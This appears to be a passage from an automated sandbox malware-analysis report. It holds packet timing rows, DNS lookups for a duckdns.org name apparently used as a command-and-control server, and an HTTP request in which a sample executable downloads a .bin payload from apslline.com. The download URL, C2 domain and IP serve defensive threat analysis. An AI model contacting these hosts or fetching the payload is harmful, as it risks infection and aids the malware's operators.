                                                                    Oct 15, 2024 17:47:35.173508883 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:35.352076054 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.357356071 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.359371901 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:35.477114916 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:35.565291882 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:36.161444902 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:36.166630983 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:36.405812979 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:36.487322092 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:36.836978912 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:36.841898918 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:36.895787954 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:36.906722069 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:37.023811102 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:37.029369116 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:37.081732035 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:37.174724102 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:37.201926947 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:37.321531057 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:37.323378086 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:37.533730984 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:37.539608955 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:37.781317949 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:37.879250050 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.289012909 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.293889999 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.304821014 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.309875965 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.319367886 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.324431896 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.324480057 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.329324007 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.538460016 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.564095020 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.564172029 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.670129061 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.716017962 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.720840931 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.739840984 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:38.839276075 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:38.961517096 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:39.175266981 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:40.281380892 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:40.330080032 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:40.350960970 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:40.356199980 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:40.527936935 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:40.672631025 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:40.905109882 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:40.911595106 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:40.911675930 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:45.366396904 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:45.418102026 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:45.672131062 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:45.968527079 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:45.968595982 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:45.972347021 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:45.973587990 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:46.211961985 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:46.332983971 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:46.333314896 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:46.895423889 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:46.900312901 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:47.142730951 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:47.259779930 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:47.264638901 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:47.503746986 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:47.514622927 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:47.519485950 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:47.767258883 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:47.851478100 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:48.024126053 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:48.029345036 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:48.053303003 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:48.058290958 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:48.150088072 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:48.154915094 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:48.268251896 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:48.379189014 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:48.387985945 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:48.557358027 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:48.557531118 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:49.532542944 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:49.537703991 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:49.568955898 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:49.575052977 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:49.591921091 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:49.596795082 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:49.780927896 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:49.836474895 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:49.836608887 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:49.900388956 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:50.063313007 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:52.140539885 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:52.333446026 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:52.573252916 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:52.672565937 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:53.813482046 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:53.818423033 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.048337936 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:54.054040909 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.057145119 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.152834892 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:54.214013100 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.292162895 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.296257019 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:54.301063061 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.373791933 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:54.378921032 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.401484966 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:54.406281948 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.414000034 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.498966932 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:54.539324045 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:54.672545910 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:54.991173983 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:55.007824898 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:55.163675070 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:55.237704992 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:55.375679970 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:55.789741993 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:55.789756060 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:55.789868116 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:56.440385103 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:56.493935108 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:56.563874006 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:56.568742037 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:56.608616114 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:56.613434076 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:56.971581936 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:57.063159943 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:57.091996908 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:57.153750896 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:57.158731937 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:57.400618076 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:57.563150883 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:57.668924093 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:57.673759937 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:57.722979069 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:57.728210926 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:57.915503979 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:58.035115957 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:58.035356045 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:58.239661932 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:58.244745970 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:58.486136913 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:58.563132048 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:59.405828953 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:47:59.410881996 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:59.701277018 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:47:59.875650883 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:00.186033010 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:00.191015959 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:00.230171919 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:00.238007069 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:00.241391897 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:00.246294975 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:00.441000938 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:00.553699970 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:00.558701992 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:00.696207047 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:00.701143980 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:00.751677036 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:00.757934093 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:01.063951015 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:01.154292107 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:01.159054041 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:01.374499083 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:01.499953032 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:01.500088930 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:01.739875078 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:01.747790098 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:02.294997931 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:02.340804100 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:02.875243902 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:02.880129099 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:03.139102936 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:03.375947952 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:03.879095078 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:03.884061098 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:04.126842976 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:04.172599077 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:06.238593102 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:06.243724108 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:06.485959053 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:06.671466112 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:07.161304951 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:07.166163921 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:07.406035900 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:07.469351053 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:07.642153025 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:07.647000074 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:07.913122892 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:08.004008055 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:08.972027063 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:08.977003098 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:09.218286037 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:09.375598907 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:10.813256025 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:10.818068981 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:11.056967974 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:11.211724997 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:11.216916084 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:11.222731113 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:11.227524042 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:11.350764990 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:11.356091976 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:11.810647011 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:11.908803940 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:11.908864021 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:11.909812927 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:12.063093901 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:12.166016102 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:12.166091919 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:12.168373108 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:12.172487020 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:12.590826035 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:12.667717934 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:12.713360071 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:12.879046917 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:13.470411062 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:13.475322962 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:13.588745117 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:13.593698978 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:13.723543882 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:13.787040949 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:13.843343973 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:13.969295025 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:15.885165930 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:15.890137911 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:16.130109072 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:16.266170025 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:22.458858967 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:22.463852882 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:22.709768057 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:22.750570059 CEST580929402192.168.2.812.221.146.138
                                                                    Oct 15, 2024 17:48:25.579440117 CEST94025809212.221.146.138192.168.2.8
                                                                    Oct 15, 2024 17:48:25.625550032 CEST580929402192.168.2.812.221.146.138
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 15, 2024 17:44:35.666043043 CEST53578781.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:44:47.122185946 CEST6147353192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:44:47.422059059 CEST53614731.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:44:53.062551975 CEST5754253192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:44:54.064605951 CEST5754253192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:44:55.064558029 CEST5754253192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:44:57.072319984 CEST53575421.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:44:57.072590113 CEST53575421.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:44:57.072612047 CEST53575421.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:01.369213104 CEST5109053192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:02.377100945 CEST5109053192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:03.377012014 CEST5109053192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:05.379540920 CEST53510901.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:05.379662991 CEST53510901.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:05.379676104 CEST53510901.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:09.878149986 CEST5903553192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:10.876940012 CEST5903553192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:11.892740011 CEST5903553192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:13.908509970 CEST5903553192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:14.415070057 CEST53590351.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:14.415086031 CEST53590351.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:14.415096998 CEST53590351.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:14.415107965 CEST53590351.1.1.1192.168.2.8
                                                                    Oct 15, 2024 17:45:19.424778938 CEST5501853192.168.2.81.1.1.1
                                                                    Oct 15, 2024 17:45:19.562762022 CEST53550181.1.1.1192.168.2.8
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 15, 2024 17:44:47.122185946 CEST192.168.2.81.1.1.10x134bStandard query (0)apslline.comA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:44:53.062551975 CEST192.168.2.81.1.1.10x729cStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:44:54.064605951 CEST192.168.2.81.1.1.10x729cStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:44:55.064558029 CEST192.168.2.81.1.1.10x729cStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:01.369213104 CEST192.168.2.81.1.1.10xcf4eStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:02.377100945 CEST192.168.2.81.1.1.10xcf4eStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:03.377012014 CEST192.168.2.81.1.1.10xcf4eStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:09.878149986 CEST192.168.2.81.1.1.10xec65Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:10.876940012 CEST192.168.2.81.1.1.10xec65Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:11.892740011 CEST192.168.2.81.1.1.10xec65Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:13.908509970 CEST192.168.2.81.1.1.10xec65Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:19.424778938 CEST192.168.2.81.1.1.10x3afcStandard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 15, 2024 17:44:47.422059059 CEST1.1.1.1192.168.2.80x134bNo error (0)apslline.com103.53.40.62A (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:44:57.072319984 CEST1.1.1.1192.168.2.80x729cServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:44:57.072590113 CEST1.1.1.1192.168.2.80x729cServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:44:57.072612047 CEST1.1.1.1192.168.2.80x729cServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:05.379540920 CEST1.1.1.1192.168.2.80xcf4eServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:05.379662991 CEST1.1.1.1192.168.2.80xcf4eServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:05.379676104 CEST1.1.1.1192.168.2.80xcf4eServer failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:14.415070057 CEST1.1.1.1192.168.2.80xec65Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:14.415086031 CEST1.1.1.1192.168.2.80xec65Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:14.415096998 CEST1.1.1.1192.168.2.80xec65Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:14.415107965 CEST1.1.1.1192.168.2.80xec65Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 15, 2024 17:45:19.562762022 CEST1.1.1.1192.168.2.80x3afcNo error (0)xwor3july.duckdns.org12.221.146.138A (IP address)IN (0x0001)false
                                                                    • apslline.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.858053103.53.40.624436560C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-15 15:44:48 UTC174OUTGET /LfGiMdRCMSvlQHkIpf170.bin HTTP/1.1
                                                                    User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: apslline.com
                                                                    Cache-Control: no-cache
                                                                    2024-10-15 15:44:49 UTC248INHTTP/1.1 200 OK
                                                                    Date: Tue, 15 Oct 2024 15:44:48 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Last-Modified: Sat, 12 Oct 2024 18:13:57 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 34368
                                                                    Content-Type: application/octet-stream
